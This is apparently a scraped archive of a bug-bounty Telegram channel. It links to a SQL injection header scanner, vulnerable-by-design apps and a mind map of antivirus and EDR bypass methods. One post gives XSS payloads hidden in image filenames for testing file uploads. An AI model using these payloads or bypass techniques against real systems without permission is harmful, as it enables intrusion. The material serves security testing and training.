fa
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

رفتن به کانال در Telegram
7 451
مشترکین
+524 ساعت
+107 روز
+17130 روز
آرشیو پست ها
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Cl
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP. https://github.com/ifconfig-me/SQLi-Scanner

Awesome Vulnerable Applications A curated list of various vulnerable by design applications https://github.com/vavkamil/aweso
Awesome Vulnerable Applications A curated list of various vulnerable by design applications https://github.com/vavkamil/awesome-vulnerable-apps

Veer Chetal a/k/a Wiz, has been arrested for his involvement in the $243M Bitcoin heist.
Veer Chetal a/k/a Wiz, has been arrested for his involvement in the $243M Bitcoin heist.

This Simple URL Encoding Made me $50,000 in Bounties https://www.youtube.com/watch?v=sW9SK0ZcHxU

File Upload via XSS If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png

DOM XSS Source/Sinks A complete set of XSS vulnerability source and SINKs that are inside the WSTG Reference repository https://github.com/wisec/domxssswiki/wiki/sinks The website https://domgo.at currently has 10 XSS exercises with code; An important feature is that the Data Flow also has a code, which will help you better understand.

Milad Bazdar Network+.pdf6.87 MB

• Volumetric Mind Map, which list the main methods and tools for bypassing antiviruses and EDR. ➡️ https://github.com/cmepw/bypassav • Necessary links: https://github.com/matro7sh/bypassav/blob/main/bypass-av.md

File_upload_bugs.png3.00 MB

In Linux, if you had a command that gave an error and needed SUDO. Use SUDO !! executes the same order with Sudo.